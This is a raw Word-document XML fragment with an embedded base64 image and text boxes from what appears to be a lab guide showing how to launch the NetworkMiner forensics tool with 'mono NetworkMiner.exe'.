wDoJP8A+Alx/wDG6pUUAUPGPibwf428MXuj&#10;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&#10;LJM56DzT/+nz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iJt&#10;3QAFAABtGgAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA&#10;hhIr9w0BAQANAQEAFAAAAAAAAAAAAAAAAABpBwAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAU&#10;AAYACAAAACEAHNfZ7t0AAAAFAQAADwAAAAAAAAAAAAAAAACoCAEAZHJzL2Rvd25yZXYueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAsgkBAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAowoBAAAA&#10;">
                <v:rect id="Rectangle 2994" o:spid="_x0000_s1217" style="position:absolute;width:1834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14:paraId="494D08A5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>cd NetworkMiner_2</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2995" o:spid="_x0000_s1218" style="position:absolute;left:13810;width:81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6EF5659D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2996" o:spid="_x0000_s1219" style="position:absolute;left:14420;width:116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03FF2366" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>7</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2997" o:spid="_x0000_s1220" style="position:absolute;left:15289;width:81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373C6CD5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 40317" o:spid="_x0000_s1221" style="position:absolute;left:15898;width:116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6CyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvurGVVlNXkVZJjjYW1Nsj+5qEZt+G7GrS/npXKPQ4zMw3zHLdm1pcqXWVZQXTSQSC&#10;OLe64kLB52E3noNwHlljbZkU/JCD9Wo4WGKsbccfdM18IQKEXYwKSu+bWEqXl2TQTWxDHLwv2xr0&#10;QbaF1C12AW5q+RhFz9JgxWGhxIbeSsq/s4tRkMybzSm1v11Rb8/JcX9cvB8WXqmHUb95BeGp9//h&#10;v3aqFcyip+kL3O+EKyBXNwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCT4Y6CyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2B456FBA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 40318" o:spid="_x0000_s1222" style="position:absolute;left:16782;width:90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rwxQAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKfRWN7GlaHQNUluSo0ZBvQ3ZMQnNzobs1qT99e6h4PHxvpfpaFpxpd41lhXEkwgEcWl1&#10;w5WCw/7rZQbCeWSNrWVS8EsO0tXjwxITbQfe0bXwlQgh7BJUUHvfJVK6siaDbmI74sBdbG/QB9hX&#10;Uvc4hHDTymkUvUuDDYeGGjv6qKn8Ln6MgmzWrU+5/Ruq9vOcHbfH+WY/90o9P43rBQhPo7+L/925&#10;VvAWvcZhb7gTroBc3QAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDifhrwxQAAAN4AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="10E374AF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>/</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2999" o:spid="_x0000_s1223" style="position:absolute;left:17453;width:55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7AAC309E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3000" o:spid="_x0000_s1224" style="position:absolute;top:2026;width:233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2600A5B0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>mono NetworkMiner.exe</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3001" o:spid="_x0000_s1225" style="position:absolute;left:17575;top:2026;width:55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31CEF888" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3002" o:spid="_x0000_s1226" style="position:absolute;left:59448;top:36122;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55752135" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3007" o:spid="_x0000_s1227" type="#_x0000_t75" style="position:absolute;left:383;top:3888;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0WxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTeml0tao2uIkLBQ6FUc/D4yL4mwezbmF2TtL/eLRQ8DjPzDbPeDrYWHbW+cqxhkigQ&#10;xLkzFRcastP7yxsIH5AN1o5Jww952G5GT2tMjev5i7pjKESEsE9RQxlCk0rp85Is+sQ1xNH7dq3F&#10;EGVbSNNiH+G2llOl5tJixXGhxIb2JeWX481qmF8/svpz8XuYTffE1l2Wu7Ndav08HnYrEIGG8Aj/&#10;tw9Gw6tSC/h7E5+A3NwBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4vutFsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId70" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3008" o:spid="_x0000_s1228" style="position:absolute;left:256;top:3761;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8RwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4gjtNbIdBqlHEF7N0dGBwd2mubbG5KU209e/NYmCWh/Nerntbiye1vnKsYTZVIIhzZyou&#10;NPxcDpM5CB+QDdaOScOLPKxXw8ESM+M6/qbnORQihrDPUEMZQpNJ6fOSLPqpa4gjd3OtxRBhW0jT&#10;YhfDbS0TpT6lxYpjQ4kNbUvK7+eH1bDvkt9wPR3v89nNmeaj2HF6umg9HvWbBYhAffgX/7m/jIZU&#10;qTg3volPQK7eAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEhgbxHBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F48A12" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C8B55D" wp14:editId="72E26C20">
                <wp:extent cx="5986577" cy="3752873"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41032" name="Group 41032"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3752873"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3752873"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3076" name="Rectangle 3076"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236388"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3ABD7F40"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77" name="Rectangle 3077"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400980"/>
                            <a:ext cx="2627902" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0E0D4215" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Network Miner is an NFT tool</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3078" name="Rectangle 3078"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1976958" y="3400980"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5A708160"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79" name="Rectangle 3079"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3603672"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="51E2F7FE"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094" name="Picture 3094"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId71"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3095" name="Shape 3095"/>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C8B55D" id="Group 41032" o:spid="_x0000_s1229" style="width:471.4pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" 